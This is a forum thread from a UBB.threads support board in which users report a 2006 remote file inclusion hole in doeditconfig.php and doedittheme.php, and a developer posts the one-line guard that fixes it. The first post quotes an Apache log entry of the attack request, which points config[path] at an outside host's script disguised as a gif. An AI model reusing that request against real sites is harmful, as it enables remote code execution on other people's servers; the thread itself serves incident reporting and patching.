Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
Who's Online
3 registered (Daryl Fawcett, ntdoc, 1 invisible), 27 Guests and 15 Spiders online.
Key: Admin, Global Mod, Mod
Featured Member
Registered: 09/18/08
Posts: 9
Top Posters (30 Days)
Ruben Rocha 179
Gizmo 111
Rick 106
Thelockman 79
driv 43
AllenAyres 35
ntdoc 28
Ian 24
Sirdude 23
ScriptKeeper 20
Latest Photos
My Home System
test photo gallery
Bernese Mountain Dogs
My Daimler
Dorado and shark
Topic Options
Rate This Topic
#130034 - 09/30/06 02:28 AM security flaw in doedittheme.php and doeditconfig.php
RSchiffman Offline
stranger

Registered: 05/03/06
Posts: 6
There is a flaw in doedittheme.php and doeditconfig.php. The symptom is that the config.inc.php gets mostly truncated and the board is blank because it can't connect to the DB. The appropriate line in the apache log is:
158.39.35.18 - - [30/Sep/2006:00:29:13 -0700] "GET /ubb/admin/doeditconfig.php?thispath=../includes&config[path]=http://abok.us/cmd
.gif? HTTP/1.1" 200 171 "-" "libwww-perl/5.65"

and

It also takes place with doedittheme as well. This is being run from multiple locations. We had a different one from spain with as well. I'm running 6.5.1 with the other security hold fixed manually. I'll update to 6.5.5, but I didn't see anything to indicate that this is fixed in the update.

Top
#130035 - 09/30/06 02:45 AM Re: security flaw in doedittheme.php and doeditconfig.php
RSchiffman Offline
stranger

Registered: 05/03/06
Posts: 6
The gif file injects a perl script. I have a copy of the script if you need it. I will be gone today, but I can do it tomorrow if you need.

Top
#130036 - 09/30/06 07:29 AM Re: security flaw in doedittheme.php and doeditconfig.php
Rick Administrator Offline

*****

Registered: 06/04/06
Posts: 7903
Loc: Aberdeen, WA
This was fixed in either 6.5.4 or 6.5.5. Basically each of these scripts needs this line at the top after the block of header comments. This keeps these scripts from being called directly.

if (!defined('IS_ADMIN')) exit;

You probably got hit from multiple locations because this was reposted on bugtraq yesterday. It's the same description of the exploit that was posted a few months back when we put out 6.5.4 and 6.5.5.
_________________________
UBB.threads™ Developer
My Personal Website · StogieSmokers.com

Top
#130037 - 09/30/06 10:19 AM Re: security flaw in doedittheme.php and doeditconfig.php
JoshPet Offline
enthusiast

Registered: 06/05/06
Posts: 292
Loc: Charlotte, NC
Ah - yeah, I've had 4 or 5 clients hit with this today, this explains why the hacks are coming out of the woodwork. Thanks for the fix.
_________________________
Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com

Top
#130038 - 10/01/06 04:46 PM Re: security flaw in doedittheme.php and doeditconfig.php
Bonny Offline
stranger

Registered: 10/01/06
Posts: 2
6.5.5?? The "Version notes" on the website only go up to 6.5.2, which is what we're running - have these not been updated? We've been hit with this same exploit.

Top
#130039 - 10/01/06 07:04 PM Re: security flaw in doedittheme.php and doeditconfig.php
Rick Administrator Offline

*****

Registered: 06/04/06
Posts: 7903
Loc: Aberdeen, WA
It looks like the version notes haven't been updated. We did send out an email to all of our customers trying to make sure that everyone got notified of the problem and that an upgrade was available.
_________________________
UBB.threads™ Developer
My Personal Website · StogieSmokers.com

Top


Shout Box

Today's Birthdays
No Birthdays
Recent Topics
I'm the Admin but.....
by David DelMonte
Today at 11:12 AM
Fatal error: Smarty::require_once
()

by ThreadsUser
Today at 08:17 AM
PayPal batch file for ID'ing expired and failed payment subscriptions?
by Mitch P.
Today at 06:02 AM
Shrinking graemlins
by Djuma
Yesterday at 05:48 PM
2 problems I'm seeing now.
by DougMM
Yesterday at 04:39 PM
Forum Stats
4261 Members
33 Forums
30535 Topics
154979 Posts

Max Online: 978 @ 06/24/07 08:19 PM